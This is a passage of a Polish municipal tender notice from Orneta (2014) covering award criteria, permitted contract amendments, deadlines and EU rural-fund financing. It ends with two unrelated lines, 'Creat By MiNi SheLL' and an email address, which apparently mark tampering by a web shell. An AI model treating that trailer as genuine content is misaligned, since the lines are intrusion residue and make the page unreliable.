<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z art. 144 ustawy Pzp Zamawiający dopuszcza możliwość dokonania czynności  prawnej polegającej na zmianie postanowień zawartej umowy w sprawie zamówienia  publicznego w stosunku  do treści oferty, na podstawie której dokonano wyboru Wykonawcy. 
2. Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian   zawartej umowy:
1)  Konieczność zmiany  terminu wykonania  przedmiotu zamówienia z uwagi na: 
a)wystąpienie w trakcie realizacji przedmiotu Umowy robót dodatkowych zgodnie z art. 67 ust.1 pkt 5 ustawy Pzp lub zamiennych opóźniających lub wstrzymujących realizację zamówienia podstawowego objętego Umową , mających wpływ na uzgodniony termin zakończenia jego realizacji 
b)konieczność wprowadzenia zmian w dokumentacji projektowej w trakcie realizacji 
przedmiotu Umowy z przyczyn niezależnych od  Wykonawcy 
c)wystąpienia niemożliwych do przewidzenia kolizji technicznych związanych z uzbrojeniem terenu  niezaznaczonych w dokumentacji technicznej, za które nie ponosi odpowiedzialności Wykonawca, 
d)działania osób trzecich lub organów władzy publicznej, które spowodują przerwanie lub  czasowe zawieszenie realizacji przedmiotu zamówienia z powodów niezawinionych przez Wykonawcę, 
e)działania siły wyższej, tj. wyjątkowego zdarzenia lub okoliczności utrudniającej  
wykonanie robót, w tym przeprowadzenie prób i sprawdzeń, dokonanie odbioru. 
f)przeszkody atmosferyczne o  charakterze katastrof  utrudniające wykonanie robót, w tym  przeprowadzenie prób i  sprawdzeń, dokonanie odbioru, 
Nie uważa się za czynnik zakłócający wpływ czynników atmosferycznych w czasie realizacji robót,   który przy składaniu ofert  musi być normalnie brany pod uwagę 
g)wystąpienia wykopalisk archeologicznych uniemożliwiających wykonanie robót, znalezienia na terenie budowy przedmiotów wybuchowych i niebezpiecznych pochodzenia wojskowego lub szczątków zwłok ludzkich, których termin usuwania będzie miał wpływ na termin realizacji robót przedmiotu zamówienia       
h)nie przekazanie placu budowy w terminie do 30 dni od daty podpisania umowy,
i)wstrzymania realizacji umowy z powodu braku płatności ustalonego wynagrodzenia, jeżeli  zwłoka  w zapłacie należnego wynagrodzenia trwa dłużej niż 60 dni od ustalonej daty  zapłaty wyszczególnionej w fakturze, 
 j)  zmiany prawa o charakterze bezwzględnie obowiązującym  - powodująca konieczność  wydłużenia procesu budowlanego (dodatkowe czynności prawne i  faktyczne nakazane  prawem nie występujące w dacie zawarcia umowy, chyba, że  w/w zmiany prawa winny być   znane stronom w sytuacji odłożonego ich wejścia w   życie - vacatio legis,
k)wystąpienia innych uzasadnionych okoliczności,  nie powstałych z winy bądź zaniedbania Wykonawcy  lub których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności,
W przypadku wystąpienia którejkolwiek z w/w okoliczności termin realizacji przedmiotu zamówienia może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności tj o okres opóźniający lub wstrzymujący realizację zamówienia potwierdzony przez   Zamawiającego lub Inspektora Nadzoru Inwestorskiego.   
2)  Zmianę wynagrodzenia wykonawcy w przypadku:
a)wystąpienia robót zamiennych (zamiennych rozwiązań technologicznych, zamiennych  materiałów i urządzeń) 
b)zmniejszenia zakresu przedmiotowego zamówienia, w szczególności na skutek:
-ograniczenia zakresu rzeczowego przedmiotu Umowy w sytuacji opisanej w ppkt 3
-konieczności uwzględnienia wpływu innych przedsięwzięć i działań powiązanych z  
zamówieniem - w szczególności zmniejszenia  zakresu przedmiotowego zamówienia 
w  branży sanitarnej i/lub drogowej  w związku z wykonaniem części robót w ramach przebudowy drogi wojewódzkiej 513 itp 
-odstąpienia od realizacji jakiegokolwiek zakresu robót budowlanych objętych 
zamówieniem w związku z zaistnieniem okoliczności, których wystąpienia  
Zamawiający nie przewidywał; 
W/w  sytuacjach Zamawiającemu przysługuje prawo do  zmniejszenia wynagrodzenia Wykonawcy, o wartość której  wysokość zostanie  wyliczona na podstawie cen jednostkowych robót kosztorysu ofertowego Wykonawcy stanowiącego załącznik nr 2 do Umowy lub czynników cenotwórczych (R, M, S, Ko, Z, Kz) przyjętych  z kosztorysu  Wykonawcy  opracowanego metodą  kalkulacji szczegółowej zgodnie z wymaganiami  Zamawiającego określonymi w § 12 ust. 23 pkt 2 IDW Rozdziału I SIWZ stanowiącego załącznik nr 5 do Umowy  i ilości faktycznie zmniejszonego zakresu rzeczowego robót  przedmiotu zamówienia. 
W takim  przypadku Wykonawca nie będzie wnosił roszczeń w stosunku do 
Zmawiającego z tytułu utraconego przychodu, zysku lub innych korzyści jakie mógł 
odnieść realizując pełen zakres robót opisanych Umową.
c)zmiany ilościowego zakresu rzeczowego przedmiotu Umowy w sytuacji opisanej poniżej  w ppkt 4 
d)zmiany stawki podatku VAT 
3) Ograniczenia zakresu rzeczowego przedmiotu Umowy w   sytuacji, gdy wykonanie danych  robót będzie zbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i  obowiązującymi na dzień odbioru robót przepisami, wykonania przedmiotu Umowy  tzw roboty zaniechane.
4)  Zmiany ilościowego zakresu rzeczowego przedmiotu Umowy tj zmniejszenia lub   
zwiększenia ilościowego zakresu rzeczowego przedmiotu Umowy w przypadku  
niezgodności przedmiaru robót z obmiarem robót tj faktyczną ilością robót  wykonanych
5)   Zmianę warunków płatności określonych w § 6 ust. 8  Projektu Umowy Rozdziału IV SIWZ  w  zakresie  zwiększenia kwoty wynagrodzenia płatnego na podstawie faktur  przejściowych roku 2014 w przypadku zabezpieczenia dodatkowych środków finansowych w budżecie gminy na rok 2014
6)   Konieczność zrealizowania jakiejkolwiek części robót, objętych przedmiotem Umowy, przy zastosowaniu odmiennych rozwiązań technicznych lub technologicznych, niż wskazane w  dokumentacji projektowej, a wynikających ze stwierdzonych wad tej dokumentacji lub zmiany stanu prawnego w oparciu, o który je przygotowano, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wykonaniem nienależytym przedmiotu Umowy,
7)  Zmiana Przedstawicieli stron na budowie po stronie wykonawcy, w następujących  przypadkach:
a)śmierci, choroby lub innych zdarzeń losowych,
b)niewywiązywania się z obowiązków wynikających z umowy,
c)jeżeli zmiana tych osób stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od wykonawcy,
Powyższa zmiana wymaga pisemnej zgody Zamawiającego. Nowa osoba musi spełniać wymagania określone w § 5 ust.2 pkt 3 Rozdziału I SIWZ (IDW) dla pełnienia danej funkcji na dzień składania ofert.
8) Zmiany lub rezygnacji z podwykonawcy dotyczącej podmiotu, na którego zasoby 
Wykonawca powoływał się na zasadach określonych w art.26 ust.2b, w celu wykazania  spełniania warunków udziału w postępowaniu, o których mowa w art.22 ust.1. Wykonawca  jest obowiązany wykazać, iż proponowany inny podwykonawca lub Wykonawca  samodzielnie spełnia warunki w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia publicznego. 
9) Zmianę w zatrudnieniu podwykonawców w przypadku, gdy Wykonawca oświadczył, iż  wykona umowę osobiście w zakresie zgodnym ze SIWZ oraz zmiany osobowej   podwykonawców oraz zakresu podwykonawstwa, 
10)  Oznaczenie stron umowy, wyłącznie w wyniku dozwolonego w myśl ustawy Prawo zamówień publicznych następstwa prawnego albo zmiany nazwy lub innego oznaczenia strony (firmy) wynikającego z prawa albo dozwolonych prawem  czynności powodujących taką zmianę.
11)  Powstanie rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie  będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony; 
12)  Konieczność wprowadzenia  zmian  wynikających z okoliczności, których nie można  było przewidzieć w chwili zawarcia umowy, a są one korzystne dla Zamawiającego     
3. Niezależnie od powyższych zmian, Zamawiający dopuszcza możliwość zmian redakcyjnych Umowy oraz zmian będących następstwem zmian danych stron ujawnionych w rejestrach publicznych, a także zmian korzystnych z punktu widzenia realizacji przedmiotu Umowy, w szczególności przyspieszających realizację, obniżających koszt ponoszony przez Zamawiającego na wykonanie, utrzymanie lub użytkowanie przedmiotu Umowy bądź zwiększających użyteczność przedmiotu Umowy. W takiej sytuacji, Zamawiający i Wykonawca wprowadzą do Umowy stosowne zmiany weryfikujące redakcyjne dotychczasowe jego brzmienie bądź wskazujące nowe dane wynikające ze zmian w rejestrach publicznych albo też kierując się poszanowaniem wzajemnych interesów, zasadą równości stron oraz ekwiwalentności świadczeń i przede wszystkim zgodnym zamiarem wykonania przedmiotu Umowy, określą zmiany korzystne z punktu widzenia realizacji przedmiotu Umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> orneta-umig.bip-um.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ornecie 11-130 Orneta , Plac Wolności 26 - Stanowisko d/s Zamówień publicznych (kam.A- parter)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.03.2014 godzina 11:00, miejsce: Urząd Miejski w Ornecie 11-130 Orneta , Plac Wolności 26 - Sekretariat pok. nr 3..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia współfinansowany jest ze środków Europejskiego  Funduszu  
Rolnego w ramach Programu Rozwoju Obszarów Wiejskich na lata 2007-2013 
Oś Priorytetowa 3 - Jakość życia na obszarach wiejskich i różnicowanie gospodarki   wiejskiej, Działanie 321 - Podstawowe usługi dla gospodarki i ludności wiejskiej -  w zakresie budowy, przebudowy, remontu lub wyposażenia targowiska stałego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com